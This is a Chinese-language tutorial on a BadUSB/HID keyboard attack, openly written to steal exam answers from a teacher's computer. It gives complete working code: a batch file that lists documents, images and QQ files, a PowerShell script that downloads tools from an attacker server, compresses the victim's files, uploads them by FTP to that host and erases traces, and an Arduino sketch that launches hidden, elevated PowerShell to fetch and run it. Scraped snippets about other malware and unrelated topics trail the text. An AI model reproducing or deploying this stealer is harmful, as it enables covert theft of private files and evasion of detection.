HID高级攻击姿势:利用PowerShell脚本进行文件窃取

0×01 引言

又到了期中考试了,我又要去偷答案了,一直发现远程下载运行exe的方式不太好,容易报毒所以这里打算用ps脚本。

0×02 关于HID

HID是Human Interface Device的缩写,由其名称可以了解HID设备是直接与人交互的设备,例如键盘、鼠标与游戏杆等。不过HID设备并不一定要有人机接口,只要符合HID类别规范的设备都是HID设备。一般来讲针对HID的攻击主要集中在键盘鼠标上,因为只要控制了用户键盘,基本上就等于控制了用户的电脑。攻击者会把攻击隐藏在一个正常的鼠标键盘中,当用户将含有攻击向量的鼠标或键盘,插入电脑时,恶意代码会被加载并执行。

0×03 准备工具

一台外网主机(直接电脑接网线宽带拨号也可以)

一个HID攻击工具(烧鹅或者Badusb)

FTPserver(搭建一个FTP服务器用来接收窃取到的文件)

PHPstudy(搭建http服务器用来存放ps脚本等)

7z.exe / 7z.dll(存放到http服务器下,之后会利用它来进行压缩后在上传,尽量减小上传速度)

0×04 代码部分(以下代码可能具有攻击性,请勿用于非法用途)

1.[get.bat](获取需要的文件存放位置,并保存到c:\temp.bat)[该代码存放于服务器http根目录下]

dir /s /a /b "%userprofile%\desktop\*.txt">c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.doc">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.docx">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.xls">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.xlsx">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.ppt">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.xls">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.eet">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.et">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.xlt">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.pdf">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.jpg">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.jpeg">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.png">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.bmp">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.gif">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.rtf">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.htl">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.txt">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.doc">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.docx">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.xls">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.xlsx">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.ppt">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.xls">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.eet">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.et">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.xlt">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.pdf">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.jpg">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.jpeg">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.png">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.bmp">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.gif">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.rtf">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.htl">>c:\temp.bat

2.[get.ps1](清除运行记录,下载服务器中的7z.dll / 7z.exe / get.bat到c盘到相应位置,处理c:\temp.bat为7z压缩为c:\Ram.7z,上传c:\Ram.7z到FTP服务器根目录下,删除所有下载的文件!!!一共需要改4处IP地址!!!)[该代码存放于服务器http根目录下记得设置FTP服务器密码为admin admin]

reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f;

(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.1/7z.dll','c:\7z.dll');

(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.1/7z.exe','c:\7z.exe');

(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.1/get.bat','c:\Users\Public\get.bat');

C:\Users\Public\get.bat;$array="";foreach($u in(get-content c:\temp.bat)){[array]$array +='c:\7z a -t7z c:\Ram.7z "'+$u+'"'};$array | Out-File -Encoding default c:\temp.bat;c:\temp.bat;

$fileinf=New-Object System.Io.FileInfo("C:\Ram.7z");

$ftp = [System.Net.FtpWebRequest] [System.Net.FtpWebRequest]::Create("ftp://192.168.1.1/"+$fileinf.name)

$ftp.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile

$ftp.Credentials = new-object System.Net.NetworkCredential("admin","admin")

$ftp.UseBinary = $true

$ftp.UsePassive = $true

$content = [System.IO.File]::ReadAllBytes($fileInf.fullname)

$ftp.ContentLength = $content.Length

$rs = $ftp.GetRequestStream()

$rs.Write($content, 0, $content.Length)

$rs.Close()

$rs.Dispose()

Remove-Item c:\temp.bat

Remove-Item c:\Ram.*

Remove-Item c:\7z.*

Remove-Item c:\Users\Public\get.*

3.[get.ino](以管理员权限下载get.ps1到本地c:\users\public目录!!!需要改1处IP地址!!!UAC闪过之后要记得拔出)[修改IP后直接刷入]

void setup() {//初始化

  Keyboard.begin();//开始键盘通讯 

  delay(5000);//延时

  Keyboard.press(KEY_LEFT_GUI);//win键 

  delay(500); 

  Keyboard.press('r');//r键 

  delay(500); 

  Keyboard.release(KEY_LEFT_GUI);

  Keyboard.release('r');

  Keyboard.press(KEY_CAPS_LOCK);

  Keyboard.release(KEY_CAPS_LOCK);

  delay(500); 

  Keyboard.println("POWERSHELL -NOP");

  delay(800);

  Keyboard.println();

  delay(800);

  Keyboard.println("START-PROCESS -fILEpATH POWERSHELL \" -NOP -W HIDDEN -C SET-eXECUTIONpOLICY rEMOTEsIGNED -FORCE;CD $ENV:PUBLIC;(nEW-oBJECT sYSTEM.nET.wEBcLIENT).dOWNLOADfILE(\'HTTP://192.168.1.1/GET.PS1\',\'C:\\USERS\\PUBLIC\\GET.PS1\');./GET.PS1;EXIT\" -vERB RUNAS;EXIT");

  Keyboard.press(KEY_CAPS_LOCK);

  Keyboard.release(KEY_CAPS_LOCK);

  Keyboard.end();//结束键盘通讯 

}

void loop()//循环

{

  Keyboard.release(KEY_LEFT_ALT);

  Keyboard.press(KEY_LEFT_ALT);

  Keyboard.print('y');

  Keyboard.release(KEY_LEFT_ALT);

  Keyboard.release(KEY_LEFT_ALT);

  Keyboard.release(KEY_LEFT_ALT);

  Keyboard.release(KEY_LEFT_ALT);

  delay(50);

}
时间: 2024-09-19 19:25:51

HID高级攻击姿势:利用PowerShell脚本进行文件窃取的相关文章

恶意软件“八月”利用powershell进行无文件感染

本文讲的是 恶意软件"八月"利用powershell进行无文件感染,Proofpoint安全研究专家提醒,一种叫做"八月"(August)的新型窃取信息恶意软件正利用Windows powershell脚本进行无文件感染并通过Word文档传播. 这个恶意软件是由高度个性化的TA530为载体来传播的,研究者表示,"八月"传播的目标是零售商的客服.管理人员,窃取目标计算机当中的认证信息与敏感文件. 为了保证感染成功,攻击者会在邮件标题中会提到目标公司

写的powershell脚本删除文件,显示一直在占用

问题描述 写的powershell脚本删除文件,显示一直在占用 remove-item <<<< 'd:read.txt' -recurse + CategoryInfo : WriteError: (d:read.txt:FileI nfo) [Remove-Item], IOException + FullyQualifiedErrorId : RemoveFileSystemItemIOError,Microsoft.PowerShell .Commands.RemoveIt

利用vbscript脚本修改文件内容,此适用于自动化的操作中_vbs

利用vbscript脚本修改文件内容,此适用于自动化的操作中 '新建一个Replace.vbs脚本,脚本内容如下,程序运行时输入三个参数:查找内容,替换内容,文件  复制代码 代码如下: Dim FileName, Find, ReplaceWith, FileContents, dFileContents   Find = WScript.Arguments(0)   ReplaceWith = WScript.Arguments(1)   FileName = WScript.Argumen

PowerShell脚本监控文件夹变化实例_PowerShell

本文介绍使用PowerShell来监视一个指定的文件夹,包括新建文件.删除文件.重命名文件等操作均会被监控或监视.本文使用了System.IO.FileSystemWatcher这个.NET对象.首先,我们来看看程序: 复制代码 代码如下: # 定义要监控的文件夹,这个文件夹必须先存在. $folder = 'D:\test' # 定义每次监控的间隔时间,这时定义为1000毫秒,即1秒 $timeout = 1000 # 创建文件系统监视对象 $FileSystemWatcher = New-O

传播恶意软件最有效帮手:超95%的PowerShell脚本都是恶意脚本

对很多IT专业人士来说,Powershell的确是Windows系统中一个相当强大的工具,而且微软也有意将PowerShell作为Windows系统的默认命令行工具.但赛门铁克最近的一份报告指出,超过95%的PowerShell脚本实际上都是恶意脚本. 赛门铁克在报告(传送门)中指出,绝大部分恶意PowerShell脚本都是扮演下载的角色.当然PowerShell脚本的终极目标还是要在设备上执行恶意代码,在整个网络传播恶意软件. 绝大多数PowerShell脚本是恶意脚本 由于PowerShel

全能型恶意攻击出现 利用宏和PowerShell攻击金融交易系统

研究人员警告称,攻击者正使用嵌入恶意宏的 Word 文档和 PowerShell,用非硬盘驻留型恶意软件感染计算机. 带有恶意宏的 Word 骚扰文档在过去几个月内成为了感染计算机的主流手段之一.如今攻击者更进一步,使用此类文档传输非硬盘驻留型(Fileless)恶意软件.这种恶意软件没有文件实体,可以直接加载到受害计算机的内存中. 安全研究人员分析了近期发生的一次攻击事件.事件中,攻击者向美国.加拿大和欧洲的企业电子邮件地址发送恶意 Word 骚扰文件.他们发送的邮件带有收件人的名字以及公司的

如何运行PowerShell脚本

  新版本的PowerShell随着Windows Server 2012 R2到来.现在,使用PowerShell 4.0的唯一途径就是获取并使用Windows Management Framework 4.0. PowerShell在Windows虚拟化任务方面能发挥最大帮助和用途.现在网上有关于此话题的资料库,最热的是TechNet博客中的一个五部分的系列文章.通过这些信息,你可以找到大量有关PowerShell脚本自动化多虚拟化设置.配置和维护任务的相关细节. TechNet系列文章提供

蓝光光盘攻击:利用蓝光光盘植入恶意木马

近日,英国安全研究人员Stephen Tomkinson发现两个基于蓝光光盘的攻击方法,通过将恶意文件存植入到蓝光光盘中,在光驱转动时读取光盘中的恶意代码发起感染电脑.网络攻击等恶意活动. 日前,NCC集团安全专家Stephen Tomkinson在播放蓝光光盘的软件上发现了两个漏洞,利用这些漏洞可以将木马植入到使用受影响设备的电脑上. Tomkinson在周五苏格兰Abertay大学的Securi-Tay会议上展示了这种基于蓝光光盘的攻击.Tomkinson制作了一个蓝光光盘,利用此光盘可以检

flash教程:利用AS脚本功能实现图片模糊变清晰

核心提示:在一些片头动画里我们经常能看到很炫的模糊变清晰的特效动画,极具视觉冲击. 在一些片头动画里我们经常能看到很炫的模糊变清晰的特效动画,极具视觉冲击.高质量的模糊效果大多利用Photoshop处理后才导入Flash中,然后利用AS脚本功能来实现图片模糊变清晰的变化效果,效果很不错. 首先用Photoshop制作两张图.一张清晰的的,一张模糊的(可以用Photoshop的高斯模糊滤镜). 把两张图片导入到FLASH中,分别建立三个图层,顺序依次为:清楚的图片(最下面).模糊的图片(在中间).